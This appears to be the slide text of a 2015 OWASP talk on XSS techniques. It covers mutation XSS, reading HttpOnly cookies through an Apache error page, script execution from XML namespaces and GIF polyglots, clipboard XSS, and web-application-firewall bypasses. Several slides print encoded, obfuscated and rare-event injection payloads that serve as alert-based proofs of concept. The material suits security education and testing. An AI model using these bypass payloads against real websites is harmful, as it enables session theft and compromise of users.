XSS tricks and bypasses that you might never hear

1. Yurii Bilyk | 2015
XSSDO YOU KNOW
EVERYTHING?

2. WHO AM I
# root

3. • WE are Penetration Testing
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM

4. AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass

5. Power of JavaScript
Modern WEB (Angular, jQuery)
Mobile APPS (PhoneGap)
Browser Performance (V8)
Server also use (Node.js)

6. Just only ALERT?
Red Alert!!!

7. What XSS can do?
CSRF and ClickJacking
XSS Tunnel & Port Scanning
Exploit machines & Botnets
And other BAD things (BeeF)

8. • Real payloads:
– http://www.xss-payloads.com
• BeeF Presentation:
– http://t.co/NLHtrxEuZ0
What XSS can do? (Links)

9. Types of XSS
Reflected XSS
Stored XSS
DOM Based XSS
Mutation XSS

10. Breaking Rules
Who cares…

11. • Two ways to modify DOM:
–DOM Direct Manipulation
–Using innerHTML
innerHtml

12. <script type ="text / javascript">
var new = "New <b> second </b> text";
function Change () {
document.all.myPar.innerHTML = new ;
}
</script >
<p id ="myPar"> First text </p >
<a href ="javascript : Change ()">
Change text above !
</a >
Example of innerHTML

13. Mutation XSS (Basics)
Web Browsers tolerates
wrong HTML syntax
It could cause very
interesting behavior
In some cases “safe” payload
could be transformed into
XSS injection

14. Example of HTML mutation
<s class ="">hello&#x20;<b>goodbye</b>
<S>hello <B>goodbye</B></S>
Original Data
Mutated data by browser

15. Example of HTML mutation (JS)
<img src ="test.jpg" alt ="``onload=xss()"/>
<IMG alt =``onload=xss() src ="test.jpg">
Original Data
Mutated data by browser

16. Mutation XSS (Some Examples)
<p style="font-family:'223bx:expression(alert(1))/*'">
<P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
Original Data
Mutated data by browser

17. Mutation XSS (Some Examples)
<article xmlns="x:img src=x onerror=alert(1)">
<article xmlns="x:img src=x onerror=alert(1)">
<img src=x onerror=alert(1) :article
xmlns="x:img src=x onerror=alert(1)">
</img src=x onerror=alert(1) :article>
Original Data
Mutated data by browser

18. Mutation XSS (Links)
https://cure53.de/fp170.pdf

19. E verybody Lies
Really, everybody

20. HttpOnly Ideal World
JavaScript CAN’T
read HttpOnly Cookies

21. HttpOnly XSS
Apache before 2.2.22 incorrectly
processes long cookies
Generated error page contains
ALL cookies from the request
We can cause such error and
read response HTML via XSS

22. HttpOnly XSS

23. HttpOnly XSS (Exploit)
https://goo.gl/kQ1mAo

24. Trust ME I’am from internet
The Phantom Menace

25. • JS can be run only from HTML?
–NO
• XML can contain valid JS?
–YES
So just run JS from XML
XSS in XML?

26. • We can insert HTML tags as CDATA
–But this is JUST text in browser view 
• We can insert valid XML element and
declare (X)HTML namespace for data
inside this tag
(X)HTML in XML

27. XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (for ex. during joining 2 xml documents)
<table>
<tr>
<td>Apples</td>
<td>Bananas</td>
</tr>
</table>
<table>
<name>Coffee</name>
<width>80</width>
<length>120</length>
</table>

28. XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:)
<h:table>
<h:tr>
<h:td>Apples</h:td>
<h:td>Bananas</h:td>
</h:tr>
</h:table>
<f:table>
<f:name>Coffee</f:name>
<f:width>80</f:width>
<f:length>120</f:length>
</f:table>

29. XSS in XML (Payload)
<x:script
xmlns:x=
"http://www.w3.org/1999/xhtml">
alert(‘XSS');
</x:script>

30. XSS in XML?

31. How it Works?
Browser’s first decision based
on the content type of document
XML allows us to define
namespace (for. ex. (X)HTML)
BINGO! Browser executes part
of XML as (X)HTML (like SVG)

32. Look Deeper
It’s obvious, isn’t it?

33. GIF File Format
GIF87a .. ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA

34. XSS GIF File Format
GIF87a /* ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA

35. XSS GIF File Format (Final)
GIF87a/*).......
GIF87a/*).......*/=0;
GIF87a/*).......*/=0;
alert(‘XSS’)

36. XSS in GIF?

37. How it Works?
JavaScript Interpreter works only
with ASCII symbols
We need to modify some
non-printable symbols in the img.
header (to create valid JS syntax)
Inject JavaScript code into image

38. Just Copy & Paste
It‘s not rocket science!?

39. Clipboard (Basics)
Clipboard operations are not
simple memory copy operations
Data loaded from the clipboard
depends on destination (Notepad)
Data stored in the clipboard
depends on the source (MS Word)

40. Clipboard XSS (How?)
Edit font style in the document
(DOC, ODT, PDF, etc.)
Type/Create some text with new
font style in this document
Copy this text and paste into
text area on the victim site

41. </style><svg><style>svg {position:fixed}</style>
<style>svg {top:0}</style><style>svg {left:0}</style>
<style>svg {height:10000px}</style> <style>svg
{width:10000px}</style> <style>svg {opacity:0}</style>
<a xmlns:xlink="http://www.w3.org/1999/xlink"
xlink:href="?"><circle r="4000"></circle>
<animate attributeName="xlink:href" begin="0"
from="javascript:alert(document.domain)"
to="&" /> </a>
Clipboard XSS (Filter Bypass)

42. Clipboard XSS

43. Clipboard XSS (Links)
http://goo.gl/yKgWPy

44. We’ll save YOU
Probably..

45. WAF (Basics)
Most WAF are signature based
WAF rules are based on RegExp
Black list is used

46. WAF XSS Bypass (Technics)
Mixed Encoding
(Double, HTML, URL encoding)
Rarely used events of the objects
and new HTML5 objects
JS-F**K Encoding

47. WAF XSS Bypass (Payloads)
URL Encoding + HTML Encoding + Unicode Encoding
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D
%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B
%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B
%2526%2523x27%3B%25 26%2523x29%3B%22%3E
<img/src="x"/onerror="promt(‘XSS’);">

48. WAF XSS Bypass (Payloads)
Rare objects events
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here
<menu id="xss" onshow="alert(1)">

49. WAF XSS Bypass (Payloads)
JS-F**K Encoding
<img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!
![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+
(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]
+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]
+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![
]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[
])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+
[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[]
)[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]
]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]
])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[]
)[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()">
<img/src="x"/onerror=“alert(1)">

50. WAF XSS Bypass (Links)
https://goo.gl/hQcPJf

51. Questions?
Fly you fools